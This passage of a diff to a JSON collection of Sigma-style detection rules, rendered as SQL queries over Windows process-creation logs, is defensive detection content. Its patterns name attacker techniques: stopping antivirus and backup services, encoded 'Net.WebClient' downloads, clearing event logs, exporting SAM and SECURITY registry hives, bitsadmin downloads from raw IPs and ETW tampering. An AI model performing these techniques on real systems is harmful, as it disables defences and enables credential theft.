'%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "test", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { "title": "Potential Windows Defender Tampering Via Wmic.EXE", @@ -7508,765 +7293,738 @@ "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "Legitimate software creating script event consumers" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + }, + { + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1543.003" + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "description": "Detects the use of SDelete to erase a file not the free space", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE 